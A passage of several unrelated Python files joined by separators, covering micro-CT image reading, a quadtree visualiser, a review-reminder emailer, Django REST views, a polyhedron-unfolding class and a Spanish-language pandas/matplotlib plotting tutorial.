selem = np.ones((5, 5, 5))
eroded = binary_erosion(median_stack, structure=selem, iterations=3)
save_stack('xian_eroded', eroded)
# ccs = skimage.measure.label(eroded)
# save_stack('xian_ccs', ccs)
#eroded = load_stack_from_path('output/xian_eroded.stack')
label_array = np.zeros((400, 400, 400), dtype=np.uint32)
label(eroded, output=label_array)
save_stack('xian_ccs', label_array)
# labels = np.unique(ccs)
# print labels
def read_isq_z_range(filename, zstart, zend):
"""Read slices from the ISQ file, starting at zstart and finishing at
zend."""
header = read_isq_header(filename)
xdim, ydim, zdim = header['xdim'], header['ydim'], header['zdim']
if zstart < 0:
raise IndexError("Requested start of z stack below zero.")
if zend > zdim:
raise IndexError("Requested end of z stack outside range of file.")
# 2048 byte header, then xdim * ydim 2 byte integers
read_start = 2048 + 2 * xdim * ydim * zstart
read_size = 2 * xdim * ydim * (zend - zstart)
with io.open(filename, 'rb') as f:
f.seek(read_start)
raw_bytes = f.read(read_size)
im_array = np.fromstring(raw_bytes, dtype='<i2')
nim = np.reshape(im_array, (xdim, ydim, -1), order='F')
return nim
def read_isq_header(filename):
"""Read an ISQ file header."""
with io.open(filename, 'rb') as f:
header_bytes = f.read(2048)
xdim = bytes_to_int(header_bytes[44:47])
ydim = bytes_to_int(header_bytes[48:51])
zdim = bytes_to_int(header_bytes[52:55])
tmp_int = bytes_to_int(header_bytes[56:60])
labels = ('xdim', 'ydim', 'zdim')
values = (xdim, ydim, zdim)
return dict(zip(labels, values))
def main():
isq_filename = "data/raw/C0000245_1.ISQ"
center = 946, 836, 779
#center = 806, 1146, 779
radius = 200
extract_single_seed_stack(isq_filename, center, radius)
if __name__ == "__main__":
main()
|
#A01022285
# Numerical Methods
# August '18'
import numpy as np
import matplotlib.pyplot as plt
def f(x):
return x**3 - np.cos(x)
def Df(x):
return 3* x**2 + np.sin(x)
x0 = 1;
i = 1;
error = 10;
while error > 1e-6:
x1 = x0 - f(x0) / Df(x0)
error = abs(x1 - x0)
x0 = x1
print("Iteracion", i, ", raiz aproximada: ",x0)
i = i + 1
|
#!/usr/bin/env python
import numpy as np
import numba as nb
import pyglet as pgl
from pyglet.gl import *
from time import perf_counter_ns as ns
_Quadtree = nb.deferred_type()
spec = [
("NW", nb.optional(_Quadtree)),
("NE", nb.optional(_Quadtree)),
("SW", nb.optional(_Quadtree)),
("SE", nb.optional(_Quadtree)),
("x", nb.float64),
("y", nb.float64),
("center_x", nb.float64),
("center_y", nb.float64),
("halfsize", nb.float64)
]
@nb.jitclass(spec)
class Quadtree:
def __init__(self, center_x, center_y, halfsize):
self.center_x = center_x
self.center_y = center_y
self.halfsize = halfsize
self.NW = None; self.NE = None
self.SW = None; self.SE = None
# x is -1 if no point is set
# -2 if the tree is subdivided
# >=0 otherwise
self.x, self.y = -1, -1
def isSubdivided(self):
return self.x == -2
def hasPoint(self):
return self.x >= 0
def _insert(self, x, y):
if y > self.center_y:
if x < self.center_x:
insert_point(self.NW, x, y)
else:
insert_point(self.NE, x, y)
else:
if x < self.center_x:
insert_point(self.SW, x, y)
else:
insert_point(self.SE, x, y)
def insert_point(self, x, y):
'''Insert a point into the quadtree.
'''
if not self.hasPoint() and not self.isSubdivided():
self.x = x
self.y = y
elif self.isSubdivided():
_insert(self, x, y)
else:
cx, cy = self.center_x, self.center_y
qs = self.halfsize / 2
self.NW = Quadtree(cx - qs, cy + qs, qs)
self.NE = Quadtree(cx + qs, cy + qs, qs)
self.SW = Quadtree(cx - qs, cy - qs, qs)
self.SE = Quadtree(cx + qs, cy - qs, qs)
_insert(self, self.x, self.y)
_insert(self, x, y)
self.x = -2
self.y = -2
_Quadtree.define(Quadtree.class_type.instance_type)
#@nb.njit(nogil=True)
def level_to_color(level):
return [40*level, 96, 128 - 4*level, 40*level, 96, 128 - 4*level]
#@nb.jit(nogil=True)
def dive_tree(tree: Quadtree, level, lines, line_colors, points):
'''Performs a DFS-style dive through the quadtree, adding
found points and lines used for quadrant visualization.
'''
# TODO: Current implementation is unsuitable for jit compilation, and thrashes memory.
# Possible solution: Preallocate a memory pool and keep track of where to place points.
if tree.isSubdivided():
cx, cy = tree.center_x, tree.center_y
hs = tree.halfsize
l1 = (cx - hs, cy, cx + hs, cy) # Horizontal line
l2 = (cx, cy + hs, cx, cy - hs) # Vertical line
lines.extend(l1)
lines.extend(l2)
color = level_to_color(level)
line_colors.extend(color)
line_colors.extend(color)
dive_tree(tree.NW, level+1, lines, line_colors, points)
dive_tree(tree.NE, level+1, lines, line_colors, points)
dive_tree(tree.SW, level+1, lines, line_colors, points)
dive_tree(tree.SE, level+1, lines, line_colors, points)
elif tree.hasPoint():
points.extend((tree.x, tree.y))
res = np.array([840, 840])
num_points = 600
center_x = nb.float64(res[0] / 2)
center_y = nb.float64(res[1] / 2)
halfsize = nb.float64(res[0] / 2)
#point_colors = np.random.randint(0, 255, 3*num_points)
point_colors = (192, 192, 192) * num_points
global line_vl
line_vl = pgl.graphics.vertex_list(0, "v2f")
point_vl = pgl.graphics.vertex_list(num_points, "v2f", ("c3B", point_colors))
win = pgl.window.Window(*res)
glEnable(GL_POINT_SMOOTH)
glPointSize(2)
def recalc(t):
tree = Quadtree(center_x, center_y, halfsize)
xs = np.linspace(0, res[0], num_points)
ys = (res[1]/4) * np.sin(1/(84 + 48 * np.sin(t/60)) * (xs)) + res[1]/2
for x, y in zip(xs, ys):
insert_point(tree, x, y)
lines = []
line_colors = []
points = []
st = ns()
dive_tree(tree, 0, lines, line_colors, points)
et = ns()
print("Dive time:", (et-st)/1e6, "ms")
point_vl.vertices = points
global line_vl
line_vl = pgl.graphics.vertex_list(len(lines) // 2, ("v2f", lines), ("c3B", line_colors))
@win.event
def on_draw():
win.clear()
line_vl.draw(GL_LINES)
point_vl.draw(GL_POINTS)
global t
t = 0
def update(dt):
global t
t += dt * 90
recalc(t)
on_draw()
recalc(0)
pgl.clock.schedule_interval(update, 1/144)
pgl.app.run() |
from .CoreManager import CoreManager
from .SceneManager import SceneManager
from .ProjectManager import ProjectManager
|
#!/usr/bin/env python3
from client.quotes_reader import QuotesReader
from client.items_reader import ItemsReader
from client.gsheet_client import GSheetClient
from notify.emailer import Emailer
from conf_reader import ConfReader
from review import Review
import random
from datetime import date
from collections import OrderedDict
def select_quote(quote_reader):
result = quote_reader.read_quotes()
return random.choice(result)
def send_email(emailer, sender, receiver, msg):
emailer.send(sender, receiver, msg)
return
if __name__ == "__main__":
# read content
conf_reader = ConfReader('conf.json')
msg = ''
try:
quote_reader = QuotesReader(conf_reader['quote-url'])
quote = select_quote(quote_reader)
quote_str = "Quote of the day: " + "\n" + quote['content'] + " -- " + quote["author"]
items_reader = ItemsReader(GSheetClient('client/token.json', 'client/credentials.json'))
daily = items_reader.read_daily()
confs = items_reader.read_conf()
laws = items_reader.read_laws()
review_items = items_reader.read_review_backlog()
review = Review()
# fill unscheduled reviews, merge, get todo list
review.fill_review_dates(confs, review_items)
review.merge_review_items(daily, confs, review_items)
todo_list = review.reschedule_and_generate_todo(confs, review_items)
# write review schedules back to sheet
items_reader.write_review_backlog(review.to_table(review_items))
# send email
greetings_str = "Hi,\n"
close_str = "Thanks,\nBot\n\nP.S. remember to update your progress here:\nhttps://docs.google.com/spreadsheets/d/1hloMXB_eL1f_OWpZR3qDSwc51AJQjLslr_yNR0u7n8c/edit"
if len(todo_list) > 0:
todo_list_str = "\n - ".join(todo_list)
todo_list_str = "Consider reviewing the following today:\n - " + todo_list_str
else:
todo_list_str = "Looks like there are no items to review today.\n"
laws_str = 'Laws enacted:\n'
for law in laws:
if law['start_date'] <= date.today() and law['end_date'] >= date.today():
laws_str += ' - ' + law['law'] + ' : ' + law['description'] + '\n'
today_str = date.today().strftime("%B %d %Y")
msg = 'Subject: {}\n\n{}\n{}\n\n{}\n\n{}\n\n{}'.format('Issues for ' + today_str,
greetings_str,
todo_list_str,
quote_str.encode('utf-8').decode('unicode_escape'),
laws_str,
close_str)
if __debug__:
print(msg)
except (KeyboardInterrupt, SystemExit):
raise
except Exception as e:
msg = 'Subject: {}\n\n{}'.format('An exception has occurred in issue-tracker', str(e))
emailer = Emailer(conf_reader['email-user'], conf_reader['email-pwd'])
send_email(emailer, conf_reader['email-sender'], [conf_reader['email-recipient']], msg)
|
from rest_framework import generics, permissions
from rest_framework.response import Response
from knox.models import AuthToken
#from .serializers import UserSerializer, RegisterSerializer
from django.shortcuts import render
from django.contrib.auth import login
from rest_framework import permissions
from rest_framework.authtoken.serializers import AuthTokenSerializer
#from knox.views import LoginView as KnoxLoginView
from rest_framework import status
from rest_framework import generics
from rest_framework.response import Response
from django.contrib.auth.models import User
from .serializers import ChangePasswordSerializer
from rest_framework.permissions import IsAuthenticated
from rest_framework.authentication import TokenAuthentication
from rest_framework.authtoken.views import ObtainAuthToken
from rest_framework import filters
from django.http.response import JsonResponse
from rest_framework.parsers import JSONParser
from rest_framework import status
from rest_framework import viewsets
from .models import Feeds
from .serializers import FeedSerializer
from rest_framework.decorators import api_view
from . import serializers
from . import models
from . import permis
class CreateTokenView(ObtainAuthToken):
serializer_class=AuthSerializer
render_classes=[api_settings.DEFAULT_RENDERER_CLASSES]
class ChangePasswordView(generics.UpdateAPIView):
"""
An endpoint for changing password.
"""
serializer_class = ChangePasswordSerializer
model = models.UserProfile
permission_classes = (permis.UpdateOwnPassword,)
def get_object(self, queryset=None):
obj = self.request.user
return obj
def update(self, request, *args, **kwargs):
self.object = self.get_object()
serializer = self.get_serializer(data=request.data)
if serializer.is_valid():
# Check old password
if not self.object.check_password(serializer.data.get("old_password")):
return Response({"old_password": ["Wrong password."]}, status=status.HTTP_400_BAD_REQUEST)
# set_password also hashes the password that the user will get
self.object.set_password(serializer.data.get("new_password"))
self.object.save()
response = {
'status': 'success',
'code': status.HTTP_200_OK,
'message': 'Password updated successfully',
'data': []
}
return Response(response)
return Response(serializer.errors, status=status.HTTP_400_BAD_REQUEST)
@api_view(['GET', 'POST', 'DELETE'])
def feeds_list(request):
# GET list of feeds, POST a new feed, DELETE all feeds
if request.method == 'GET':
feeds = Feeds.objects.all()
title = request.GET.get('title', None)
if title is not None:
feeds = feeds.filter(title__icontains=title)
feeds_serializer = FeedSerializer(feeds, many=True)
return JsonResponse(feeds_serializer.data, safe=False)
@api_view(['GET', 'PUT', 'DELETE'])
def feed_detail(request, pk):
# find feeds by pk (id)
try:
feed = Feeds.objects.get(pk=pk)
except Feeds.DoesNotExist:
return JsonResponse({'message': 'The Feed does not exist'}, status=status.HTTP_404_NOT_FOUND)
if request.method == 'GET':
feeds_serializer = FeedSerializer(feed)
return JsonResponse(feeds_serializer.data)
elif request.method == 'PUT':
feed_data = JSONParser().parse(request)
feeds_serializer = FeedSerializer(feed, data=feed_data)
if feeds_serializer.is_valid():
feeds_serializer.save()
return JsonResponse(feeds_serializer.data)
return JsonResponse(feeds_serializer.errors, status=status.HTTP_400_BAD_REQUEST)
elif request.method == 'DELETE':
count = Feeds.objects.all().delete()
return JsonResponse({
'message': '{} Feeds are deleted successfully'.format(count[0])
}, status=status.HTTP_204_NO_CONTENT)
class UserProfileViewSet(viewsets.ModelViewSet):
serializer_class=serializers.UserProfileSerializer
queryset=models.UserProfile.object.all()
authentication_classes=(TokenAuthentication,)
permission_classes=(permis.UpdateOwnProfile,)
filter_backends=(filters.SearchFilter,)
search_fields=('username','email',)
|
N, K = (int(x) for x in input().split())
A = list(int(x) for x in input().split())
ng, ok = 0, 10**18
while ok - ng > 1:
m = (ok + ng) >> 1
t = sum(min(a, m) for a in A)
if t >= K:
ok = m
else:
ng = m
K -= sum(min(a, ok-1) for a in A)
for i in range(N):
A[i] -= min(A[i], ok-1)
i = 0
while K > 0:
if A[i] > 0:
A[i] -= 1
K -= 1
i += 1
print(*A) |
from graph import Graph
from faces import Face
import polyhedra_generation
from component import Component
from component_node import ComponentNode
import json
import numpy as np
class Polyhedron(object):
def __init__(self, vertices=None, faces=None, filelist=None):
"""
initialize a polyhedron either with a list of vertices and faces OR
a list of FOLD files where each file is a separate component of the polyhedron
faces - list of Face objects
faces_vertices - list of indices into self.vertices defining each face
vertices - list of coordinates (np array) of each vertex
components - list of lists indices into self.faces where each list of indices defines a component
"""
if vertices is not None and faces is not None:
self.faces = faces
self.vertices = vertices
elif filelist is not None:
self.components = []
total_faces = 0
for f in range(len(filelist)):
with open(filelist[f]) as f_o:
data = json.load(f_o)
faces, _, _, _ = self.parse_fold_file(filelist[f])
self.components.append(range(total_faces, total_faces+len(faces)))
total_faces += len(faces)
if f == 0:
polyhedra_generation.create_fold_file("tmp.fold", data)
else:
polyhedra_generation.create_fold_file("tmp.fold", data, append=True)
self.faces, self.faces_vertices, self.vertices, self.edges = self.parse_fold_file("tmp.fold")
else:
raise Exception("must pass in either both vertices and faces or filename(s) to constructor")
faces_vertices, edges_vertices, vertices_coords = self.grid_divide(self.faces_vertices, self.edges, self.vertices)
polyhedra_generation.create_fold_file("tmp2.fold", {'faces_vertices': faces_vertices, 'edges_vertices': edges_vertices, 'vertices_coords': vertices_coords})
self.faces, self.faces_vertices, self.vertices, self.edges = self.parse_fold_file("tmp2.fold")
self.primal_graph = self.create_primal_graph()
self.dual_graph = self.create_dual_graph()
self.layers = self.get_layers()
all_faces = self.dual_graph.get_V()
component_graph = self.dual_graph.copy()
for i in xrange(len(self.layers) - 1):
faces_between = [key for key in all_faces if all_faces[key].between_layers(self.layers[i + 1], self.layers[i])]
subgraph_between = self.dual_graph.subgraph(faces_between)
for face in faces_between:
if face not in component_graph.get_V():
continue
connections = subgraph_between.get_reachable(face)
component_dual_graph = subgraph_between.subgraph(connections)
component = Component(component_dual_graph, self.layers[i + 1], self.layers[i])
component_graph = component_graph.combine_vertices(connections, component)
self.component_graph = component_graph
self.unfolding_tree = self.create_unfolding_tree()
def parse_fold_file(self, filename):
"""
parse the fold file and return a list of faces
:param filename: file name (str) of the .fold file
:return: None, but update self.faces and self.vertices
"""
with open(filename) as f:
data = json.load(f)
vertices_coords = data["vertices_coords"]
faces_vertices = data["faces_vertices"]
edges_vertices = data["edges_vertices"]
faces = []
for f in faces_vertices:
vertices = [np.array(vertices_coords[i]) for i in f]
# determine the normal direction of the face
direction = np.cross(vertices[1] - vertices[0], vertices[3] - vertices[0])
direction = direction.astype(np.float)
direction /= np.linalg.norm(direction)
direction_str = None
if abs(direction[0]) > .9:
if direction[0] < 0:
direction_str = "-x"
else:
direction_str = "+x"
elif abs(direction[1]) > .9:
if direction[1] < 0:
direction_str = "-y"
else:
direction_str = "+y"
elif abs(direction[2]) > .9:
if direction[2] < 0:
direction_str = "-z"
else:
direction_str = "+z"
faces.append(Face(vertices, direction_str))
return faces, faces_vertices, vertices_coords, edges_vertices
def grid_divide(self, faces, edges, vertices):
all_vertices = vertices
all_edges = edges
all_faces = faces
cuts = [set(), set(), set()]
for v in all_vertices:
cuts[0].add(v[0])
cuts[1].add(v[1])
cuts[2].add(v[2])
for d in xrange(len(cuts)):
for cut in cuts[d]:
new_vertices = []
new_edges = []
new_faces = []
cut_edges = []
old_faces = []
for e in all_edges:
if all_vertices[e[0]][d] == all_vertices[e[1]][d]:
continue
v_1 = min(all_vertices[e[0]][d], all_vertices[e[1]][d])
v_2 = max(all_vertices[e[0]][d], all_vertices[e[1]][d])
if v_1 < cut and v_2 > cut:
new_vertex = list(all_vertices[e[0]])
new_vertex[d] = cut
new_vertex_id = len(all_vertices) + len(new_vertices)
new_vertices.append(new_vertex)
new_edges.extend([[e[0], new_vertex_id], [e[1], new_vertex_id]])
cut_edges.append(e)
for i in xrange(len(new_vertices)):
for j in xrange(len(new_vertices)):
if i >= j:
continue
for f in all_faces:
if self.e_in_f_FOLD(cut_edges[i], f) and self.e_in_f_FOLD(cut_edges[j], f):
new_edges.append([len(all_vertices) + i, len(all_vertices) + j])
old_faces.append(f)
new_face1, new_face2 = self.split_FOLD_face(f, len(all_vertices) + i, len(all_vertices) + j, cut_edges[i], cut_edges[j])
new_faces.extend([new_face1, new_face2])
# break
all_vertices.extend(new_vertices)
for ce in cut_edges:
all_edges.remove(ce)
all_edges.extend(new_edges)
for of in old_faces:
all_faces.remove(of)
all_faces.extend(new_faces)
all_faces = self.remove_duplicate_faces(all_faces, all_vertices)
return all_faces, all_edges, all_vertices
def e_in_f_FOLD(self, e, f):
if e[0] in f and e[1] in f:
return True
return False
# v1 and v2 are vertex ids (not actual vertex)
def split_FOLD_face(self, f, v1, v2, e1, e2):
for i in xrange(len(f)):
if f[i] in e1 and f[(i + 1) % len(f)] in e1:
new_face1 = [f[i], v1, v2, f[i - 1]]
new_face2 = [v1, f[(i + 1) % len(f)], f[(i + 2) % len(f)], v2]
break
elif f[i] in e2 and f[(i + 1) % len(f)] in e2:
new_face1 = [f[i], v2, v1, f[i - 1]]
new_face2 = [v2, f[(i + 1) % len(f)], f[(i + 2) % len(f)], v1]
break
return new_face1, new_face2
def remove_duplicate_faces(self, faces, vertices):
extra_faces = []
for d in xrange(3):
for i in xrange(len(faces)):
if faces[i] in extra_faces:
continue
if len(set([vertices[v][d] for v in faces[i]])) != 1:
continue
projectable = [faces[i]]
for j in xrange(i + 1, len(faces)):
if faces[j] in extra_faces:
continue
if len(set([vertices[v][d] for v in faces[j]])) != 1:
continue
if self.faces_projectable(faces[i], faces[j], d, vertices):
projectable.append(faces[j])
if len(projectable) > 2:
projectable.sort(key=lambda x: vertices[x[0]][d])
extra_faces.extend(projectable[1:-1])
return [f for f in faces if f not in extra_faces]
# returns true if f1 and f2 projected along axis are equivalent
# only true if f1 and f2 have normals along axis
def faces_projectable(self, f1, f2, axis, vertices):
f1_proj = []
for v_id in f1:
v = list(vertices[v_id])
del v[axis]
f1_proj.append(v)
f2_proj = []
for v_id in f2:
v = list(vertices[v_id])
del v[axis]
f2_proj.append(v)
for p in f1_proj:
if p not in f2_proj:
return False
return True
def create_primal_graph(self):
"""
create primal graph, where nodes are vertices and edges are edges in the polyhedron
:return: Graph object
"""
edges = set()
for face in self.faces_vertices:
for i in range(len(face)):
next_v = (i+1) % len(face)
if (face[i], face[next_v]) not in edges and (face[next_v], face[i]) not in edges:
edges.add((face[i], face[next_v]))
# convert set of tuples to list of lists
edges = list(edges)
edges = [list(e) for e in edges]
return Graph(self.vertices, E_list=edges)
def create_dual_graph(self):
"""
creates a dual graph from a list of faces. Nodes are faces and edges exist between nodes if the two faces
are adjacent on the polyhedron (share an edge)
:return: Graph object
"""
edges = []
for u in range(len(self.faces)):
for v in range(u, len(self.faces)):
# check to see how many vertices are shared between face u and face v, 6 unique vertices means adjacent
if len(set(self.faces[u].get_vertices(as_tuple=True) + self.faces[v].get_vertices(as_tuple=True))) == 6:
edges.append([u, v])
return Graph(self.faces, E_list=edges)
def write_dual_graph(self, filename):
"""
write dual graph to FOLD format in linakge form for visualization
:param filename: string
:return: None
"""
data_out = {"vertices_coords": [],
"edges_vertices": []}
for u in self.dual_graph.E:
center = self.dual_graph.get_V()[u].get_center()
data_out["vertices_coords"].append([x for x in center])
for v in self.dual_graph.E[u]:
data_out["edges_vertices"].append([u, v])
polyhedra_generation.create_fold_file(filename, data_out, frame_class="linkage")
# returns a list of layers as a list of y-values
def get_layers(self):
y_values = [vertex[1] for vertex in self.vertices]
return sorted(list(set(y_values)))
def create_unfolding_tree(self):
components_dict = self.component_graph.get_V()
root = components_dict.keys()[0]
root_component = self.component_graph.get_vertex(root)
root_node = ComponentNode(root_component)
remaining = [c for c in components_dict if c != root]
root_node, _ = self.create_unfolding_subtree(root_node, remaining)
return root_node
def create_unfolding_subtree(self, root_node, remaining_components):
remaining = remaining_components
for c in remaining_components:
if not remaining:
break
if c not in remaining:
continue
component = self.component_graph.get_vertex(c)
bridge = self.get_bridge(root_node.component, component)
if not bridge:
continue
remaining.remove(c)
c_node = ComponentNode(component)
child, remaining = self.create_unfolding_subtree(c_node, remaining)
child.add_parent_bridge(bridge[1])
root_node.add_child(child)
root_node.add_child_bridge(bridge[0])
return root_node, remaining
# returns the bridge connecting component c1 and component c2
# returned as a list of length 2 of lists where the first sublist is the portion of the bridge in c1 as a sequence/path of faces and the second sublist is the portion not in c1
def get_bridge(self, c1, c2):
if c1.y == c2.y_minus_1:
y = c1.y
else:
y = c1.y_minus_1
c1_faces = c1.get_faces()
c2_faces = c2.get_faces()
c1_z = [face for face in c1_faces if c1.get_face(face).direction == '+z' or c1.get_face(face).direction == '-z']
c2_z = [face for face in c2_faces if c2.get_face(face).direction == '+z' or c2.get_face(face).direction == '-z']
all_faces_dict = self.dual_graph.get_V()
y_faces = [face for face in all_faces_dict if all_faces_dict[face].in_layer(y)]
face_subgraph = self.dual_graph.subgraph(c1_z + c2_z + y_faces)
c2_z_set = set(c2_z)
for face in c1_z:
layers = [[face]]
all_faces = [face]
while layers[-1]:
next_layer = []
for vertex in layers[-1]:
connections = face_subgraph.get_connections(vertex)
connections = [c for c in connections if c not in all_faces and self.path_is_straight(face_subgraph.get_vertex(vertex), face_subgraph.get_vertex(c))]
all_faces.extend(connections)
if not c2_z_set.isdisjoint(connections):
for c in connections:
if c in c2_z_set:
next_layer = [c]
break
break
next_layer.extend([c for c in connections if face_subgraph.get_V()[c].in_layer(y)])
layers.append(next_layer)
if next_layer and next_layer[0] in c2_z_set:
break
if layers[-1] and layers[-1][0] in c2_z_set:
break
if not layers[-1]:
return []
path = []
path.append(layers[-1][0])
prev = layers[-1][0]
for i in reversed(xrange(len(layers) - 1)):
connections = face_subgraph.get_connections(prev)
for face in layers[i]:
if face in connections and self.path_is_straight(face_subgraph.get_vertex(prev), face_subgraph.get_vertex(face)):
path.insert(0, face)
prev = face
break
c1_bridge = [path[0]]
c2_bridge = path[1:]
'''
for face in path:
if face in c1_faces:
c1_bridge.append(face)
else:
c2_bridge.append(face)
'''
return [c1_bridge, c2_bridge]
# returns common edge between 2 faces
def get_common_edge(self, f1, f2):
f1_vertices = f1.get_vertices(as_tuple=True)
f2_vertices = f2.get_vertices(as_tuple=True)
common = []
for v in f1_vertices:
if v in f2_vertices:
common.append(v)
return common
# returns true if path is straight
def path_is_straight(self, f1, f2):
common = self.get_common_edge(f1, f2)
if common[0][0] == common[1][0]:
return False
else:
return True
def write_to_off(self, out_filename):
"""
output this polyhedron as an .off file
:param out_filename: (str) filename of output .off file
:return: None
"""
nv, nt = len(self.vertices), len(self.faces)*2 # will split each face into 2 triangles
tri = [] # list of triangles (indices into vertex array)
for v1, v2, v3, v4 in self.faces_vertices:
tri.append([v1, v2, v3])
tri.append([v1, v3, v4])
with open(out_filename, 'w') as out:
out.write("OFF\n")
out.write("%s %s 0\n" % (nv, nt))
for v in self.vertices:
out.write("%s %s %s\n" % (v[0], v[1], v[2]))
for f in tri:
out.write("3 %s %s %s\n" % (f[0], f[1], f[2]))
print "wrote %s vertices and %s faces to %s" % (nv, nt, out_filename)
if __name__ == "__main__":
p = Polyhedron(filelist=["../data/test/unit_cube_open.fold", "../data/test/rect_box.fold"])
c = p.component_graph.get_V()[5]
# c.unfold_strip_leaf(11, "-y")
c.unfold_strip_intermediate([13, 15, 14], ["-y", "+y", "-y"], 11, "+y", [2, 2, 1])
# c.unfold_strip_root(12, "-y", 2)
p.write_to_off("../out/poly.off")
#p = Polyhedron(filelist=["../data/boxes2.fold"])
#p = Polyhedron(filelist=["../data/the_box.fold"])
|
# -*- coding: utf-8 -*-
# ---
# jupyter:
# jupytext:
# formats: ipynb,py:light
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.5.2
# kernelspec:
# display_name: Python 3
# language: python
# name: python3
# ---
import pandas as pd
from matplotlib import pyplot as plt
# # Intro
#
# La visualización de datos es el proceso de proveer una representacion visual de datos. En esta clase revisaremos algunas de las bibliotecas mas comunes para este proposito dentro del ecosistema de python y al final de la misma tendremos herramientas para comunicar datos de una manera efectiva.
#
# ## Bibliotecas
# - Módulo de plotting de pandas
# - Pyplot
# - Seaborn
# - Pandas profiling
# # Descargamos la data
# Vamos a utilizar los datos de la [encuesta de sueldos 2020.02](https://sysarmy.com/blog/posts/resultados-de-la-encuesta-de-sueldos-2020-2/) de [sysarmy](https://sysarmy.com/es/).
# +
GSPREADHSEET_DOWNLOAD_URL = (
"https://docs.google.com/spreadsheets/d/{gid}/export?format=csv&id={gid}".format
)
SYSARMY_2020_2_GID = '1FxzaPoS0AkN8E_-aeobpr7FHAAy8U7vWcGE7PY4kJmQ'
# -
df = pd.read_csv(GSPREADHSEET_DOWNLOAD_URL(gid=SYSARMY_2020_2_GID), skiprows=9)
# ## Una pequeña preview
pd.options.display.max_columns = None
df.head()
# # Pandas plotting
#
#
# Pandas incorpora algunas facilidades para [visualizaciones](https://pandas.pydata.org/pandas-docs/stable/user_guide/visualization.html) que son _wrappers_ alrededor de matplotlib. Se pueden utilizar [otros backends](https://pandas.pydata.org/pandas-docs/stable/user_guide/visualization.html#plotting-backends) desde la versión 0.25.
#
# Veremos algunos plots sencillos aquí.
# ## Pie chart
# Tenemos una variable binaria en la encuesta de sueldos que indica si la persona que respondió contribuye a proyectos open source. La respuesta es por `sí` o por `no`. Queremos ver como se distribuyen las respuestas. Para esto, hagamos un [pie chart](https://pandas.pydata.org/pandas-docs/stable/user_guide/visualization.html#pie-plot).
df['¿Contribuís a proyectos open source?'].value_counts().plot(
kind='pie', autopct='%1.0f%%'
)
# ## Barplot
#
# Ahora, consideremos la elección de sistemas operativos:
df['¿Qué SO usás en tu laptop/PC para trabajar?'].value_counts().sort_values(
ascending=False
)
# Con un pie plot, quedaría demasiado... complicado de interpretar:
df['¿Qué SO usás en tu laptop/PC para trabajar?'].value_counts().plot(
kind='pie', autopct='%1.0f%%'
)
# BSD es una elección poco común, queda totalmente perdida. Por otro lado, sin las anotaciones de los porcentajes, sería muy dificil saber la diferencia entre `macOS` y `GNU/Linux`. `Windows` es más de la mitad, pero... ¿Cuánto mas?
#
# Por esto, es mejor un [bar plot](https://pandas.pydata.org/pandas-docs/stable/user_guide/visualization.html#bar-plots):
df['¿Qué SO usás en tu laptop/PC para trabajar?'].value_counts().sort_values(
ascending=False
).plot(kind='bar')
# ## Scatter plot
#
# Ahora tenemos la duda, ¿Cómo se relaciona el salario bruto con el salario neto? Tenemos puntos en dos dimensiones y queremos entender como se relacionan. Para ello, un [scatter plot](https://pandas.pydata.org/pandas-docs/stable/user_guide/visualization.html#scatter-plot) es adecuado:
df.plot(
x='Salario mensual NETO (en tu moneda local)',
y='Salario mensual BRUTO (en tu moneda local)',
kind='scatter',
)
# Tenemos un montón de puntos apelotonados en la diagonal, veamos de reducir el diámetro de cada punto:
df.plot(
x='Salario mensual NETO (en tu moneda local)',
y='Salario mensual BRUTO (en tu moneda local)',
kind='scatter',
s=5,
)
# ## Histograma
#
# Ahora, la encuesta considera también los ajustes salariales. Ese porcentaje varía por empresa. ¿hay muchos valores únicos?
df['¿De qué % fue el ajuste total?'].nunique()
# Sí, montones. Podemos hacer un bar plot?
# +
# df['¿De qué % fue el ajuste total?'].plot(kind='bar')
# -
# Podemos _intentarlo_ pero tarda una barbaridad en renderizarse.
#
# Entonces, tenemos un soporte continuo, demasiados valores únicos. Seamos inteligentes y hagamos un [histograma](https://pandas.pydata.org/pandas-docs/stable/user_guide/visualization.html#histograms).
df['¿De qué % fue el ajuste total?'].plot(kind='hist')
# Cambiando la cantidad de `bins` tenemos mayor granularidad:
df['¿De qué % fue el ajuste total?'].plot(kind='hist', bins=25)
df['¿De qué % fue el ajuste total?'].plot(kind='hist', bins=50)
# ## Box plots
#
# Siguiendo la línea de los salarios netos y brutos... ¿Cuánto es la media? ¿La mediana? Podemos tener un resumen estadístico con un [box plot](https://pandas.pydata.org/pandas-docs/stable/user_guide/visualization.html#box-plots)
df[
(df['Salario mensual NETO (en tu moneda local)'] < 500000)
& (df['Salario mensual BRUTO (en tu moneda local)'] < 500000)
][
[
'Salario mensual NETO (en tu moneda local)',
'Salario mensual BRUTO (en tu moneda local)',
]
].plot(
kind='box'
)
# Los labels quedan feos... como un hack, podemos renombrarlos:
df[
[
'Salario mensual NETO (en tu moneda local)',
'Salario mensual BRUTO (en tu moneda local)',
]
].rename(
columns={
'Salario mensual NETO (en tu moneda local)': 'Salario neto',
'Salario mensual BRUTO (en tu moneda local)': 'Salario bruto',
}
).plot(
kind='box'
)
# # Matplotlib
# Dijimos que de fondo pandas usa [matplotlib](https://matplotlib.org) para hacer los plots. Es una librería que permite trabajar a bajo nivel, pero que también tiene un módulo de alto nivel llamado [pyplot](https://matplotlib.org/api/pyplot_api.html) que ofrece una interfaz similar a matlab, y es bastante cómoda. Muchas librerías de visualizaciones usan de fondo matplotlib.
#
# Si revisamos los plots que hemos visto, nos gustaría poder cambiar algunas cosas:
# - el tamaño
# - la escala
# - agregarle título
# - descripción del eje y
# - descripción del eje x
# - etc
#
# Revisaremos estos conceptos para trabajar más comodamente al momento de hacer plots
from matplotlib import pyplot as plt
import matplotlib
# ## Elementos de un plot
# El siguiente código ha sido tomado de [la documentación de matplotlib](https://matplotlib.org/3.1.1/gallery/showcase/anatomy.html#anatomy-of-a-figure) para mostrar los diferentes elementos de un plot
# + jupyter={"source_hidden": true}
import numpy as np
import matplotlib.pyplot as plt
from matplotlib.ticker import AutoMinorLocator, MultipleLocator, FuncFormatter
np.random.seed(19680801)
X = np.linspace(0.5, 3.5, 100)
Y1 = 3 + np.cos(X)
Y2 = 1 + np.cos(1 + X / 0.75) / 2
Y3 = np.random.uniform(Y1, Y2, len(X))
fig = plt.figure(figsize=(8, 8))
ax = fig.add_subplot(1, 1, 1, aspect=1)
def minor_tick(x, pos):
if not x % 1.0:
return ""
return "%.2f" % x
ax.xaxis.set_major_locator(MultipleLocator(1.000))
ax.xaxis.set_minor_locator(AutoMinorLocator(4))
